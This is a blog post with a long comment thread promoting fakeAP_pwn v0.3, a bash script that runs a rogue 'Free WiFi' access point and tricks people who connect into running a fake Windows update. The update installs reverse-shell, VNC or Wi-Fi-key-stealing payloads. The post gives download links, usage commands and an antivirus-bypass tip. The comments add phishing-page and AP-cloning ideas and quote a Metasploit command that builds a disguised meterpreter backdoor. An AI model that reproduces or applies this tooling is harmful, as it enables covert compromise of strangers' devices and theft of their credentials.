There are lots of "moving parts" in this and "different environments" it has to work in too.
It was made with BackTrack 4 is out - it hasn't been updated for backtrack 5.
I'm going to re-do it all "soon", however not right now. For the people which are having trouble - I'm unable to give support right now - due to lack of free time. You're on your own until fakeAP_pwn v0.4 is out.
Links
Watch video on-line: http://g0tmi1k.blip.tv/file/4079518
Download video: http://www.mediafire.com/?yo06t9yiyeq4fff
Download Script (fakeAP_pwn-v0.3.tar): http://www.mediafire.com/?hakic7kqk8b6e8c
Download Script (fakeAP_pwn.v0.3-127.tar.gz): http://www.mediafire.com/?j2hz9rce10zh1w3
What is this?
An update to the script, fakeAP_pwn, which is a bash script to automate creating a "Fake Access Point" and "pwn" whoever connects to it!
How does it work?
> Creates an access point, runs a DHCP & web server.
> Creates an exploit via Metasploit.
> Waits for the target to connect, download and run the "update".
> Once successfully exploited, it automatically uploads a payload; SBD, VNC or WKV via the exploit
> Depending on the mode, it will grant internet access after infection
> The attacker has the option to run a few "sniffing" programs to "monitor" what the target does on our access point!
What do I need?
> The tar file, fakeAP_pwn-v0.3.tar (1018.5KB, SHA1:7C8605F19210FEDC3219822D4D28CC7D1E4A4996)
> A wireless card --- that supports monitor mode
> Optional: Another interface (wired or wireless) with internet access
> aircrack-ng suite, dhcpd3, apache2, metasploit, dnsiff suite, wget --- All on BackTrack!
> Optional: Subversion, hostapd, macchanger, sbd, vnc, squid, mogrify, imsniff, driftnet, sslstrip, ettercap --- Which all can be install by fakeAP_pwn
Whats new?
In short, a lot. (=
When comparing it to an older version just about everything has changed, expect for the original idea! See the changelog at the end for more details.
Whats in the tar file?
> fakeAP_pwn.sh --- Bash script
> www/index.php --- The page that the target is forced to see before they have access to the Internet.
> www/Linux.jpg, OSX.jpg, Windows.jpg, your operating system.jpg --- OS pictures
> www/tick.jpg, favicon.ico --- Other images
> www/sbd.exe --- SBD payload
> www/vnchooks.dll, winvnc.exe, vnc.reg --- VNC payloads
> www/wkv-x86.exe, wkv-x64.exe --- WKV payloads
How do I use it?
1.) Extract the tar file (tar xf fakeAP_pwn-v0.3.tar).
2.) Copy the "www" folder to /var/www/fakeAP_pwn (cp www/* /var/www/)
3.) Either edit fakeAP_pwn.sh or specify, via command line, your interface(s)/mode/payload. (You can view your interfaces via ifconfig and use kate to edit.)
4.) Wait for a connection...
5.) ...Game over. (=
Commands:
tar xf fakeAP_pwn-v0.3.tar cd fakeAP_pwn ls mkdir /var/www/fakeAP_pwn cp www/* /var/www/fakeAP_pwn bash fakeAP_pwn.sh clear ifconfig bash fakeAP_pwn.sh -? bash fakeAP_pwn.sh -m non -p wkv -v bash fakeAP_pwn.sh -m normal -V bash fakeAP_pwn.sh -m flip -d ls kate fakeAP_pwn.log
Troubleshooting
- "Odd"/Hidden SSID
- airbase-ng doesn't always work... Re-run the script
- Try hostap
- Can't connect
- airbase-ng doesn't always work... Re-run the script
- Try hostap
- Try using two WiFi cards with Diagnostics mode enabled
- Target is too close/far away
- I've found "Window 7" connects better/more than "Windows XP"
- No IP address
- Use latest version of dhcp3-server
- Re-run the script
- Slow
- Don't run/target a virtual machine
- Try hostap
- Try using a different MTU value
- Your hardware (Example, 802.11n doesn't work too well)
- Bypassing "Problem" programs
- Anti Virus - As of 2010-09-02, you MAY be able to bypass a SOME by uncommenting line 1397 --- BackTrack only.
- Windows Firewall - I'm working on it for the next release (=
- UAC - Not sure... )=
- ... still not working correctly?
- Re run with Diagnostics mode enabled (-d)
- Make a note of the setup (Hardware, versions etc)
- Get in touch!
- Big thanks to joker5bb for giving a helping hand with the coding
- Thanks to everyone testing out the beta releases/giving feedback
- Tested in BackTrack 4, R1. Works with Ubuntu 10.04 too!
- It's worth doing this "manually" (without the script) before using this, so you have an idea of what's happening, and why. The script is only meant to save time.
- I'm running BackTrack 4 R1 in VM, The target is running Windows 7 Ultimate (fully up-to-date 2010-09-02), with firewall enabled, no AV and with UAC enabled (Windows 7 Default). The other target is running in a VM using Windows XP SP3 Professional.
- All connections are reversed - meaning the connections come from the target to the attacker, therefore, as the attacker is the server, so it could help out with firewalls...
- As you can see in the code there is a "roadmap", one day I plan for this to also affect Linux and OSX, support multiple clients, have a different "delivery system" and a "Cloning" mode.
- The video doesn't demonstrate everything...
- The video uses fakeAP_pwn v0.3 #100
Song: Sigma - Paint It Black & The Prodigy - One Love & Zombie Nation - Kernkraft. 400
Video length: 11:48
Capture length: 33:07
Blog Post: http://g0tmi1k.blogspot.com/2010/09/scriptvideo-fakeappwn-v03.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/32462-%5Bscript%5D-%5Bvideo%5D-fakeap_pwn-v0-3-a.html#post173954
~g0tmi1k
Changelog
2010-10-28 - v0.3 (Build 125)
> Added: IP info
> Added: Logging of IPTables
> Added: Port check & Kill apps
> Changed: "DHCP Server" (Using dhcpd3 again)
> Changed: "Temp" output folder
> Fixed: Display bug (when gateway was wrong)
> Fixed: Hostapd detecting bug
> Fixed: Install "apps" bug
> Fixed: IPTables - "Clear" bug
> Fixed: IPTables - "Force" bug
> Fixed: www/ folder copy bug
> Updated: "Help" screen (Removed unused commands)
> Updated: Internal working (Bug fixes, Renamed values, Uses less output windows, etc)
> Updated: Metasploit script
> Updated: Ping tests
> Updated: Screen outputs
2010-09-02 - v0.3 (Build 100)
> Added: 'Diagnostics' and 'Verbose' modes
> Added: 'HostAP' to create access point
> Added: 'Monitoring connections' feature
> Added: 'Normal' & 'Flip' (Upside-Down-Ternet) modes
> Added: 'Update' feature
> Added: 'WKV' payload
> Added: More 'checks' & 'Self fixes'
> Added: More programs to 'extra' features
> Changed: The DNS server
> Fix: lots of bugs/errors
> Renamed and moved sections about
> Updated: 'index' & OS images
> Updated: 'metasploit', 'dhcpd3', 'apache' scripts
> Updated: 'sbd.exe' & 'vnc.exe' & 'vnc.reg'
> Updated: The 'help' screen
> Updated: The all of the 'internal structure/workings'
> Updated: The command line arguments
> ...and a couple of extra 'little' things
great script and GREAT song choice! everything is great :D great you well can't say great thanks but he thnx ;)
ReplyDelete@Nivong
ReplyDeleteThanks for the kind words
why is it 10.0.0.1? isnt you gateway ip is 192.168.0.1? have you tested it on a box? or just a virtual machine?
ReplyDeletei really cant configure the settings, please assist me..
thank you
@mastahhh
ReplyDeleteBecause it creates its own network, I choose to use 10.0.0.0/8 for the IP's to use.
My gateway is 192.168.1.1, but this doesn't matter as it automatically detects your gateway.
Yes, Ive tested this on BackTrack & Ubuntu - both on a real and virtual machine, attacking both real & virtual machines too.
To configure the settings, either:
> edit the script (example, usign kate)
> use command lines options (see -? )
Both methods are in the video
wow.. is so Great..
ReplyDeletethx for shared
i'm still waiting
for next tutorial post :)..
"did You have a g0tmi1k"
Oh i see, hmm, yes it worked, but it's hidden,and sometimes it cannot connect. Like you had list on troubleshooting.
ReplyDeleteFurthermore, i can say this exploit, is very good.
Thank you..:)
Hi, i got 2 wifi cards, and I have my interface set to wlan0
ReplyDeleteand wifiInterface to wlan1. When I run fakeAP_pwn.sh I need to start my network and WICD again to get it to work. Anyway to fix this?
Nice brother good works
ReplyDeleteWhat is drawing that new system info on the desktop with all the graphs ?
ReplyDelete@mastahhh
ReplyDeleteWhat OS are you targeting?
If you can, setup and use hostapd
@Sonej
I'll have a look into it, and have a fix out as soon as I can
@rodrigo
Thanks for the thanks
@Garethd
conky
tried it on xp, vista, and 7. still hidden..Yes, I tried hostapd, installed properly, but in the end, i can't get it working. So my only option is using airbase-ng and im facing many problems, tried also 2 wireless cards. wlan0 and wlan1. still hidden, and unable to connect..
ReplyDeleteany suggestions?
@mastahhh
ReplyDeleteYou could try and spend more time to get hostapd working?
Which two wifi cards did you try? (not the interface names, but the make/model?)
Have you tired to edit line 1412, and remove "-W 0"?
What command lines are you using?
Try it once again, but this time with "-d", and post the output?
I have tried this one out but my test machine[victim] can't seem to connect.
ReplyDelete@blackhatstuff,
ReplyDeleteSorry, but how can you know it can't connect without trying it?!
dude thanks for responding, yes I really can't connect to[Free Wifi]. I don't know what I'm doing right now but if you can share a good link on configuring "hostap" that would be great. Thanks master
ReplyDelete@blackhatstuff
ReplyDeleteWhat version are you using?
Could you post the output of "-d"?
What is displayed on "Access Point" window (top left window)? Does it say anyone has connected?
You can install hostapd in the latest version of the script. Else look on the thread (link is in the post), and Joker has posted a guide on how to install it manually.
This comment has been removed by the author.
ReplyDeleteThe normal and flip mode isn't working for me it always uses the sbd payload method instead. I've tried setting both on the cli and the editing the script.
ReplyDelete@WSWFu
ReplyDeleteWhat version are you running?
If you haven't, try and update it. bash fakeAP_pwn.sh -u
fakeAP_pwn v0.3 #125
ReplyDeleteDownload: http://www.mediafire.com/?r8636m3cd8lmkdg
Added: IP info
Added: Logging of IPTables
Added: Port check & Kill apps
Changed: "DHCP Server" (Using dhcpd3 again)
Changed: "Temp" output folder
Fixed: Display bug (when gateway was wrong)
Fixed: Hostapd detecting bug
Fixed: Install "apps" bug
Fixed: IPTables - "Clear" bug
Fixed: IPTables - "Force" bug
Fixed: www/ folder copy bug
Updated: "Help" screen (Removed unused commands)
Updated: Internal working (Bug fixes, Renamed values, Uses less output windows, etc)
Updated: Metasploit script
Updated: Ping tests
Updated: Screen outputs
It's worth re-downloading the tar.gz instead of using "-u".
fakeAP_pwn v0.3 #126
ReplyDeleteFixed: ESSID bug
Fixed: Route bug
Fixed: SSLStrip bug
Removed: "Extras" --- Needs more testing, will be added back in later
http://code.google.com/p/fakeap-pwn/source/detail?r=126
http://www.mediafire.com/?8t88l8il0gedh8g
This comment has been removed by the author.
ReplyDeleteHi, firstly I'd like to thank you for your great work and I think that you do not have much time on their projects but I would like to ask once or add the option to edit their own fake site. I have tried over and htm php, only the backdoor set I did not directly link to the site to open.
ReplyDeleteThank you again, good luck:)
Again nice update, will check it soon. Still I have a request, can there be a option to sellect that there is no backdoor if a client connects? (don't know if this is already there?) So we can use it as a acces point?(handy for my mobile phone with less wifi ranche)
ReplyDeleteAnd keeping up the good work!
@Nivong
ReplyDeleteYes, its already there.
"Normal" - Just does "wifi tethering".Doesn't force a backdoor. ;)
@andrew007
ReplyDeleteYou can edit/replace "www/index.php" with your own site.
You need to have a link to the backdoor, "http://anything.you.like.com/Windows-KB183905-x86-ENU.exe"
e.g. Download
I want to have babys with you (LOL)
ReplyDelete@Nivong
ReplyDeleteLOL.
(=
***fakeAP_pwn v0.3 #127***
ReplyDeleteFixed: "Creating temp folder" bug
Fixed: "Debug output" bug
Fixed: "WiFi driver" bug
Fixed: "WiFi Key" bug
Updated: Internal working
Updated: "Update" function
http://code.google.com/p/fakeap-pwn/source/detail?r=127
Download: http://www.mediafire.com/?j2hz9rce10zh1w3
Should i overwrite the original file with the update or should i directly use the update file only?
ReplyDeleteAnd cant i change the essid Free Wifi?
And one more thing the site that victim sees i think it should be more developed so that they cannot notice it is fake.it should be somewhat similar to that of the official site of microsoft.
And more one thing.I really admire your work.
ReplyDeleteI thought something like this was just an imagination.But you proved it real.Great Job
@Sorup
ReplyDeleteYou should ALWAYS create a backup. Then I would overwrite it.
Test it, see if it works okay, you like the update. Then it's up you if you keep the backup.
Yes, You can change the ESSID, if you open it up in a text editor, look for Like ESSID=Free-WiFi.
There has been an update to the webpage, I don't know if you have seen it.
I don't think I could copy/clone the official page due to copyright and other legal issues. )=
Yes, to make it look better (still), is on my to-do list, however it's right at the bottom.
And thanks for the thanks,
Any feedback (good or bad) on it would be great (=
Yeah i have seen the new page in the updated version. But i think we should think and try something to tempt people.VNC can easily be detected on the background. Is there any alternative to it to hide it.U also can include wpa / wep login page apart from wkv. It would seem more official
ReplyDelete@Sorup
ReplyDeleteAs I said, I don't want to clone someone elses due to copyright and other legal issues.
Plus I would rather spend my time trying to improve the code, add new features etc, rather than work on the fake page.
If you want to see an improve on it your more than welcome to do it yourself, and I would love to see what you have done to it.
About the VNC, were would you like it to be hidden from? I'm sure it's as easy to detect it compare to SBD... (tbh, both are pretty easy to be detected.)
With the login idea, the only issue is, if people connect randomly, and force to see "login before you can use", then will just log off the wifi again, as they don't know what the login details are.
Oh i m sorry but i just mean to say your script can be modified to clone the wpa access point nearly essid can be cloned and the victim who has access to the original access point will be tempted to connect to it and key in the wpa passphrase.
ReplyDelete@Sorup
ReplyDeleteThat's planned! (Cloning another AP near by)
However - I haven't had the time to code it... And there are a other couple of things I want to see in fakeAP_pwn before cloning!
keep up the good work.i want to see this to version 1 SET.
ReplyDeleteA nother feature that would be really nice!
ReplyDeleteInstead of running appach and use the webpage you made, let it redirect to a special IP adres. Like for example if I use SET it makes a webpage(clones a page) and that would be better looks more legit.
You understand me :P ?
@Sorup,
ReplyDeleteI haven't got much free time at the mo )=
and what free time Ive got I'm trying to work/complete on a few more scripts/videos before I start work again on fakeAP_pwn.
@Nivong
Yes, I get you. (=
Nice idea. Ill keep it in mind for v0.7 ('Cloning' Stage !)
How do you run backtrack? Couse I read alot of things that vmware isn't working well?
ReplyDelete@Nivong
ReplyDeleteI've got:
> Backtrack 4 R1 on old desktop that lives under my desk which is what I usually use.
> Backtrack 4 *something* on a USB stick too. I only use it when I'm travailing/holiday.
Yes, somethings have "issues" when its run in VM. Airbase-ng is one of theses. Personally I've found that airbase-ng is ALOT more stable when I use it on a "real" PC, instead of VM. Hostapd seams 'okay' when use in "real" or VM.
Great work and Great Tut
ReplyDeletethnx for ur usefull vedios
can u add please a vedio show how can u hack a online clients
like the online games clients
can I show victim saved wireless password? or upload an another injection like a trojan or program what show wireless password??
ReplyDelete@tah
ReplyDeleteThanks for the thanks.
I'll take your idea in consideration when I start recording videos again.
@marti
Yes. fakeAP_Pwn can do this already.
Try: WKV mode. (=
It uses a program (WirelessKeyView) to do it.
Hi, I'm giving a try to your FakeAP_pwn running on BT4R1, with victim being a WinXP-SP3.
ReplyDeleteThe victim connects very easily to the FakeAP but the fake page is never shown: when from InternetExplorer I try to open whichever web page I'm not shown the fake page but instead the error message of PAGE NOT FOUND.
I'm running NON-TRANSPARENT MODE.
Thanks,
Alessandro
did you copy the www files alessandro ?
ReplyDelete@g0tm1lk
I found a (bug) problem in the script.
I am on a hotspot(using a inlog pass) and after login in I have internet. But fakeap_PWN doesn't say I have internet so it switches to non. NOW the problem is I HAVE internet(I can view youtube, gmail etc.) I redownloaded the script. Isn't working.
My setup:
2 wifi cards
1=wifi0 (internet connection)
2=wifi1 (no internet connection, want to use for fakeap)
So anychange you can fix this?
NVM got that working, Now I have a problem:
ReplyDelete/root/fakeAP_pwn/fakeAP_pwn.sh: line 556: [: too many arguments
I enabled extras to true
So that's bug 1, now on my iPad I can't recive a IP and also not on my mobile (windows based) device(HD2) but I can recive it on XP, wtf :P?
Yes, www files have been copied.
ReplyDeleteTo add to my previous comment, I have seen that the fake page appears in victim pc only when in the IE i ask for the url http://10.0.0.1
Instead for all other urls (for example www.facebook.com) i receive PAGE NOT FOUND.
Alessandro.
This comment has been removed by the author.
ReplyDeletewher can i download 0.2.5 version??
ReplyDeletev0.2.5 is much betere as v0.3
I dont like vnc in version 0.3
victim must click twice to run the exploit in versopn 0.3,in version 0.2.5 must victim click once to run exploit .
http://g0tmi1k.blip.tv/file/3622180
is much beter but there is no link to download anymore
Absolutely beautiful piece of architecture...
ReplyDelete@Alessandro
ReplyDeleteIm going to need alot more information to help you.
What version are you running of fakeAP_pwn?
What is the output (please could you run it with -v)? Could you share the log file?
How are you running it? VM, USB, DVD, HDD?
Does the target get a IP address?
What is shown on the attackers screen?
@Nivong
Thanks for helping out
What version of fakeAP_pwn are you using?
I've made a note of it - and I'll look at it when I next can!
@Nivong
What did you do to fix it?
Extras hasn't been tested too well - it causes alot of issues.
I've also made a note of it!
About the IP issues - does anything show in the DHCP window? What about the fakeAP window?
What is your setup? Can you share the log file or the output when using -v?
@Alessandro
Okay - so it sounds like a DNS issues - its not redirecting sites to 10.0.0.1. A few people have reported this. Personally, I don't have any issues in my lab, so its hard for me to find a fix for it. I'm working on something tho!
@jan
What do you mean by "click twice?"
As soon as the target runs VNC - it then infects them!
It then gives them a fake warning message about running it - it doesn't matter what they click as they are already infected!
The reason why this was added, the target was waiting too long for feedback, and wouldn't know if what they have done, has "updated" their system.
Was this the only reason why you don't like v0.3?
I've archived v0.2.5.
Download link: http://www.mediafire.com/?iq5o4u6xora2p21
@Cold Element
Thanks for the thanks! (=
Glad to know someone likes it! =D
I used the latest version.
ReplyDeleteI also figured out that I &&@*$ up my backtrack DHCP server. Will reinstall this today, and try it again.
Btw in the DHCP window, there happend nothing....
Oh and What I did to fix it, I restarted backtrack and then it did run :P
ReplyDeleteBtw my setup:
Wlan0= Intel 5100 (inside of the laptop)
Wlan1= Edimax RT73 Turbo (thing)(external)
Backtrack installed on the main HDD (dual boot with my windows 7 installtion
@Nivong
ReplyDeleteAre you using airbase-ng? Have you tried hostapd?
Yes I use airbase, hastapd isn't compatible with my wlan....
ReplyDelete@ G0tm1lk
ReplyDelete---------
Sorry for my late answer, but I was out of my town.
I'm trying to answer your questions creating one post for each question.
Q: What version are you running of fakeAP_pwn?
ReplyDeleteA: 03-127
Q: Could you share the log file?
ReplyDeleteA: See "fakeAP_pwn.log" available at
https://docs.google.com/leaf?id=0B2Ryu437Ip17ODViYmIzYmYtOTI2Yi00M2Y4LTg3YzItZTI0NGE3MzdmZTc2&hl=it
Q: How are you running it? VM, USB, DVD, HDD?
ReplyDeleteA: DVD live with BT4R1 (If you prefer I could download and try R2)
Very important: given that I'm using a live distribution, i don't want every time to download
and install DNSMASQ, so i have downloaded the two .DEB files and everytime I install DNSMASQ with:
dpkg -i dnsmasq-base_2.45-1ubuntu1.1_i386.deb
dpkg -i dnsmasq_2.45-1ubuntu1.1_all.deb
Could this be the cause of the problem?
Q: Does the target get a IP address?
ReplyDeleteA: IPCONFIG shows
IP ADDRESS=10.0.0.150
Subnet mask=255.255.255.0
Dft Gateway=10.0.0.1
Q: What is shown on the attackers screen?
ReplyDeleteA: See "snapshot1.png" available at
https://docs.google.com/leaf?id=0B2Ryu437Ip17MWUwN2UzMWQtMDgyNS00MGY1LWI5NzMtM2ZiMzY3ZDk2ZDE5&hl=it
A last thing, for further communications it would be better to use PM at BackTrack Forums. My user account is JackBauer.
ReplyDeleteStill another thing: at this link you can find the fakeAP_pwn.sh script i'm using: it is the standard version in which i just changed some of the default values: https://docs.google.com/leaf?id=0B2Ryu437Ip17MThjMTFjZjktZTJjNC00NjQ3LTlkYjMtZmRjYjczNDU2MzRi&hl=it
ReplyDeleteIn this way you should be able to reproduce the exact situation.
@Nivong
ReplyDeleteHow are you running it? VM, UDB, HDD?
VM has known issues and it's been reported that it doesn't behave well when ran from a USB BT.
Its best to try it from a real HDD seutp.
What WiFi card have you got? What drivers is it using?
@Alessandro
ReplyDeleteAlso sorry for my late reply.
However Im going to reply in just one post ;)
About the log file - it seems to being missing the last half of it (however, I don't think its needed)
It looks like your having DNS issue (which seems to happen for a couple of people).
Personall I dont have this issue, so its hard for me to replicae, which makes it harder to find a solution...
However, Joker a while back said he believes he found the problem and is working on a solution.
It's known that it has issues when fakeAP_pwn is ran in a VM, and its been reported that it doesn't work well with "live" setups. If you can, its worth doing a real install onto your HDD.
However, as you have managed to get that far - it's a good sign. Could you comfirm your WiFi card and driver? By looking at the log file, its saying its using "iwlagn", which I guess is for "Intel Corporation PRO/Wireless 4965". However, you said for it to use "wlan1" (in builts are usally wlan0), am I right in thinking its "rtl8187", but whats the card? I didn't have much joy when I use my internal WiFi card, "Intel 5100 ~ iwlagn".
I haven't been able to work on this for a while, however I do plan to start work on it around March time. (I will have more free time then).
Ill track you down and send you a PM after Ive sent this out.
Hey g0tmilk,
ReplyDeletei'm a skiddie. your bt4 vmware video was really helpful. But, bt ain't able to do detect my intel 5100wifi... Any work around? also heard 5100 doesn't support packet injection, true? I'd be really thankful if you could me with the 5100 patch and am sure there are others with 5100s.
Thanks mate.
My card
ReplyDeletewlan0 ralink 2573 usb
wlan1 intel 4965
I edit fakeap_pwn.sh
interface=wlan0
wifiinterface=wlan1
i do to Command bash fackeap_pwn.sh
internet access:failed
dndmasq isn't installed
and i type y and enter
failed to install dnsmasq
Can you help me
[quote]
ReplyDeleteg0tmi1k said...
@mastahhh
Because it creates its own network, I choose to use 10.0.0.0/8 for the IP's to use.
My gateway is 192.168.1.1, but this doesn't matter as it automatically detects your gateway.
[/quote]
thats wrong. it doesnt. my router works on 10.0.0.1 and iam absolutly NOT able to tell fakeAP_pwn.sh that he has to use a diffrent ip. @ variables i can define an IP for the AP but that setting doesnt seem to work at all. it STILL uses 10.0.0.1 as LHOST which cant work....
if i download ver. 127 of your script, it just goes till:
ReplyDeleteoot@bt:~/fa# bash fakeAP_pwn.sh
[*] fakeAP_pwn v0.3 (#127)
[>] Analyzing: Environment
thats all, you can wait , but there is nothing going to happen anymore. ( BT4RC2 newest updates etc )
so the 0.3 doesnt work with 10.0.0.1 as router and the
newer fakeAP version doesnt work at all, good job...realy good job.
@Joe
ReplyDeleteYou can only use USB WiFis instead a VM, if you wish to use your inbuilt, you need to either use a CD, USB or install it to the HDD
It sounds like the 5100 is support in backtrack 4, however its not stable.
For a rough guide, try reading/following this:
http://www.backtrack-linux.org/forums/old-backtrack-4-non-working-hardware/19768-intel-5100-injection-problem.html#post142874
@dunglambay
It fails because you don't have a internet connection.
Make sure you can surf to google.com before running
*start-networking, dhclient [internface], firefox -> google.com*
@supreme
No, it IS true. it creates its own network!
Exp you have the same IP addresses, which is why there is a problem. (hence it fails to create its own network)
Currently it’s not coded to support your setup. I've made a note of this, and will add something in for the next release.
@supreme (second post)
What happens when you run -v? -V? Or -d? Can you post the log files which are then created? This will show more information.
fakeAP_pwn doesn't support your setup; it was designed with class C networks in mind, 192.168.x.x. Maybe one day it will, however this was a project I setup in MY lab, just sharing it with the people that want it (and from the tone of your post, you don't). As most people use class C in their labs - this isn't usually a problem for them (wifi drivers/cards is what the common issue is).
me was successfully
ReplyDeletebut victim down WKV very slow
How to change MTU value
@dunglambay
ReplyDeleteRight click on the script, and look for the line "MTU=1500". Edit it to your own needs
This comment has been removed by the author.
ReplyDeleteHow to hidden essid victim catch it connect me
ReplyDeleteMy use laptop probe still found essid victim so victim can connect Access Point its
My Card wifi WUSB54GC Ver 3
My card wifi activities not far
What card wifi activities = Access Point and support Backtrack 4 RC2
@dunglambay
ReplyDeleteSorry, I don't understand your comment. Could you re-word it?
HI All,
ReplyDeleteMay I have some quidance on adding a wep key to access my FakeAP ?
Sorry,i use google Translation
ReplyDeleteI can't fake AP victim ,victim still see and connect
Dear g0tm1lk:
ReplyDeleteI can not run the script "(fakeAP_pwn.v0.3-127.tar.gz)"in Ubuntu Maverick 10.10 do not work the dhcp3 server. Displays an error. /var/run/dhcpd/dhcpd.pid not found. "dhcpd3 failed to start".
Please can you help me or someone from the blog.
Thank you very much
It could be an authorization problem.
ReplyDeleteTry giving full permissions to var folder:
chmod -R 777 /var
Thank you very much JackBauer
ReplyDeleteThat was the solution, now loads fine. But there is a problem, I get an error that is not? Error: Rex:: Post:: Meterpreter:: ResqestError core_channel_open: Operation failed: the system can not find the file specified.
What is this error?
THANKS
@maverickmk
ReplyDeleteIt hasn't yet been coded into it - however you can do it yourself
#127, line 1368, add "-w [yourwepkey]"
and make sure your using airbase-ng!
@dunglambay
I still don't understand.
You say "can't AP victim", however you then say you can "see and connect".
What issue are you having?
@Fran
Its only been tested fully with backtrack, I've started work to support other OS (such as ubuntu (as backtrack is based upon it))
How did you install dhcpd?
@JackBauer
Thanks for the helping hand ;)
@Fran
Glad to hear that error has been fix.
It sounds like metasploit/meterpeter is looking for a file that doesn't exist.
As you said before, your using ubuntu. Now it could be because of permissions and the script is unable to write a file "somewhere".
Which screen is this shown in? What stage?
Could you try running the script again, and add either -V or -d at the end, and paste the output/debug file to pastebin.com?
Dear g0tm1lk:
ReplyDeleteMy pastebin is: http://pastebin.com/8rfw6Cj9
http://pastebin.com/e4WprZss
Install dhcp:
apt-get -y install dhcp3-server ; update-rc.d -f dhcpd3 remove
Thanks for the feedback, however I'm suck on version #101 as my setup does'nt seem to like #127 (similar problem to supreme, freezes at "[>] Analyzing: Environment" but i'm using a class C setup.
ReplyDeleteKeep up the admired work!
Regards
Maverick
When the script is running i'm encountering this error:
ReplyDelete"[!] Internet access: Failed"
"[i] Switching mode: non"
I've searched the script code and i've noticed that the script executes the command "wget -q -O - whatismyip.org" and if it fails it prints the above messages...I would like to ask if it's really a network error that prevents script smooth execution and how could i fix it(My default network interface is eth0 and my wired network interface is wlan0 )...
Thanks in advance G0tmi1k!
This comment has been removed by the author.
ReplyDeleteGreat work on the script. I still use Rev #101 all the time. Are going to release any new revisions past Rev 127? Once again keep up the good work and I always look foward to your new vids.
ReplyDeleteRegards
DsGb
Great piece of work.. Could I add a WPA key to the fake wifi network so i can clone an existing wifi network?
ReplyDeleteAl_Capone said...
ReplyDeleteWhen the script is running i'm encountering this error:
"[!] Internet access: Failed"
"[i] Switching mode: non"
I've searched the script code and i've noticed that the script executes the command "wget -q -O - whatismyip.org"
I found the same problem. I did a little googling and found that the site "whatismyip.org" doesn't seem to exist. I DID, however, find whatsmyip.org. I replaced that part of the script and still have the same problem. Can't verify the connection. Tried uncommenting the ping line just after the wget command and commenting the wget but still no bueno.
Other than that it works fine for me. Great work g0tmi1k!
The script still isn't working completely as intended yet but I have been able to find a couple of minor glitches/improvements. the 'wget -q -O - whatismyip.org' is very slow for me so I found a .com site and it seems to work well enough that I don't timeout every time I try to connect. No matter, I still can't figure out why the connected client can't access the internet. Was wondering if there was any other way (scripting-wise) to have the client use my internet connection for access?
ReplyDeleteHow can i get password AP of victim ?
ReplyDeleteg0tm1lk first of all I must say that your knowledge of backtrack and Linux bash is extraordinary.I have only one thing , a small request , I don't think it will take you much time , your script serves an update page , with a payload , and I would be greatfull if you could modify script for me so that it doesn't serve a payload, just to server an login page , I have made login page and all the other things , but my I am learning bash and your code it to professional for me to modify it , and since I respect your work I thought maybe I should ask for your permission . Thank you sir :)
ReplyDeleteFirst error is:
ReplyDelete"Couldn't test packet injection"
this is right afer it's configuring wireless card
adn then
"Scanning access point"
"Couldn't find the fake acces point.."
why is that ?
@everyone.
ReplyDeleteThere are a lot of moving parts in this.
There are lots of different environments it has to work in too.
There is also a new version of backtrack out.
There are a "few" different version of fakeAP_pwn - and the latest isn't the greatest (from what I remember).
Its been a while since I've work on this.
Im going to re-do it all one day, however not right now. For the people which are having trouble - I'm unable to give support right now - due to limited time. All I can say is try and do it manually else wait for fakeAP_pwn v0.4.
Will it be updated for BackTrack 5?
ReplyDeleteI tried update it myself.
I stuck "Couldn't create explot" error
Hi G0t. Congratlations for your fantastic work! I have a question about this tool. I'm running on Backtrack 5, when i start it, i've got two errors: First: "Can't detect the gateway" and the second (it will be a cause of the first) is "Failed: Couldn't create exploit". Can you help me to fix it? Thank you so much mate.
ReplyDelete@ Above two: The "Cannot create exploit" error can be fixed by changing the metasploit reference in the script. I solved this using locate.
ReplyDeleteI use bt5 too and they do not use the default install path, I changed the references to look like this:
"
action "Metasploit (Windows)" "/opt/framework3/msf3/msfpayload windows/meterpreter/reverse_tcp LHOST=$ourIP LPORT=4564 R | /opt/framework3/msf3/msfencode -x $www/sbd.exe -t exe -e x86/shikata_ga_nai -c 10 -o $www/Windows-KB183905-x86-ENU.exe"
"
@Anyone who can help: I can get past that exploit creation part but I cannot seem to get my DHCPD3 up and running properly to use the script :(
Well I got it mostly up and running. My issue was a permissions issue I changed some directories and bingo!
ReplyDeleteI spotted what I bet is a typo in the IP tables portion and fixed it "liit" changed to "limit"
@g0tmi1k: This is beautiful thank you for teaching me so much about these tools and about bash in general.
@anyone: I have it running, I can see it from other devices, but nothing can establish the connection, any idea where I should start looking? I am using non mode if that helps (due to the fact right now I only have 1 wifi adapter)
Hi, I have the lastest version of your script (#127)
ReplyDeleteThe script executes fine until dhcp3.
here's the error I get(with option -V -d):
[>] Starting: DHCP
Command: /etc/init.d/apparmor stop ; aa-complain dhcpd3 ; dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0
[!] dhcpd3 failed to start
I can't figure out why it fails.
Hi people,
ReplyDeleteIts working for me in BackTrack5,i post one image:http://i52.tinypic.com/a13dph.png
If you want use fakeap_pwn in BT5 ,you should change PATH only, and DHCP problems are made by apparmor!
I have fakeap_pwn0.3 #127 working fully in my Backtrack5.
Variuos problems with metasploit:
"Failed to load extension: No response was received to the core_loadlib request"
I am downgrade to BT4r2 ,and i will try script there.And then i tell us.
Cheers !
How did you get it work with BT5 i get the DHCP error, or have you a customized script? Thanks
ReplyDeleteOn BT 4 It's work! God job! Many thanks
ReplyDeleteOn BT 5:
[>] Starting: DHCP
[!] dhcpd3 failed to start
Please update to BT 5
Can you implement bypass UAC exploit!!
ReplyDelete@wMw
ReplyDeleteYes - it will be updated for BackTrack 5 (When I find the time too).
Thanks for reporting that issue - I will look into it when the time comes.
Like the post above your: "For the people which are having trouble - I'm unable to give support right now - due to limited time. All I can say is try and do it manually else wait for fakeAP_pwn v0.4."
@Gaia
Thanks for the thanks =)
It yet hasn't been made for backtrack 5. I just haven't had the time.
I did explain this two posts above yours.
@PalverZ
Thanks for the fix, I will make a note of it =)
...and the DHCP and DNS have been a issue since the days of Backtrack 4 ;)
*I think I might of found a fix for fakeAP_Pwn v4*
@PalverZ (again)
Another fix! Cheers for that =)
Thanks for pointing out the typo.
Your welcome! Glad it's helped you
Regarding unable to connect - what WiFi device are you using? What driver? What is the target OS? How far away is the client to the AP?
@HDmovies
The latest isn't always the greatest - you can find older version on the SVN.
There has been some report fixes for DHCP in the comments above.
@dudu
I'm glad to see it has been working ;)
BackTrack 5 now comes with metasploit v4 - so the rc file which is generated might need to be updated.
@terrafaux
There has been possibles fixes reported in the comments above
@Mark
